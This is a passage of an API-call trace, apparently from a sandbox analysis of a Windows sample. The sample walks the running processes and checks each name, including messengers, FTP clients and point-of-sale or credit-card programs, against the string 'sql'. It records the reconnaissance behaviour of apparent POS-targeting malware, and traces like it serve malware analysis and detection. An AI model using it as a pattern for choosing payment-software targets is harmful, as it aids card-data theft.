lpMultiByteStr=0x3583ff8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0153.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0153.154] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0153.154] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0153.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.156] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584178 [0153.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584178, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0153.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0153.156] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0153.156] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0153.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.157] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584190 [0153.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3584190, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0153.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0153.157] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0153.157] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0153.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.158] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584148 [0153.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584148, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0153.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0153.159] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0153.159] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0153.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.160] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583ef0 [0153.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3583ef0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0153.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0153.160] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0153.160] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0153.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.161] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584070 [0153.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3584070, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0153.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0153.161] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0153.161] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0153.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.163] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583fc8 [0153.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3583fc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0153.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0153.163] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0153.163] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0153.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.164] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583fe0 [0153.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3583fe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0153.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0153.164] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0153.164] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0153.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.165] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584010 [0153.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3584010, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0153.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0153.166] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0153.166] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0153.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.568] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596da8 [0153.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3596da8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0153.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0153.568] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0153.568] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0153.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0153.577] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596cc8 [0153.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3596cc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0153.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0153.654] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0153.654] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0153.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.655] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583f68 [0153.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3583f68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0153.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0153.655] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0153.656] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0153.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.656] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35841a8 [0153.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35841a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0153.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0153.657] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0153.657] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0153.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.658] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584160 [0153.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3584160, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0153.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0153.658] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0153.658] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0153.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0153.659] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3584028 [0153.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3584028, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0153.659] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0153.659] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0153.659] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0153.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0153.660] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3596d08 [0153.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3596d08, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0153.660] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0153.660] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0153.660] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0153.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0153.661] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596e48 [0153.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596e48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0153.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0153.661] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0153.661] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0153.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.662] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583f50 [0153.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3583f50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0153.662] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0153.662] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0153.662] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0153.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.663] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584088 [0153.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3584088, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0153.663] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0153.663] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0153.663] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0153.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.664] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35840a0 [0153.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35840a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0153.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0153.664] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0153.664] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0153.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0153.665] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596b28 [0153.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3596b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0153.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0153.665] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0153.665] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0153.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.669] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584040 [0153.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3584040, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0153.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0153.669] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0153.669] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0153.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.670] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35840d0 [0153.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35840d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0153.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0153.671] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0153.671] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0153.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.671] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3596e28 [0153.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", 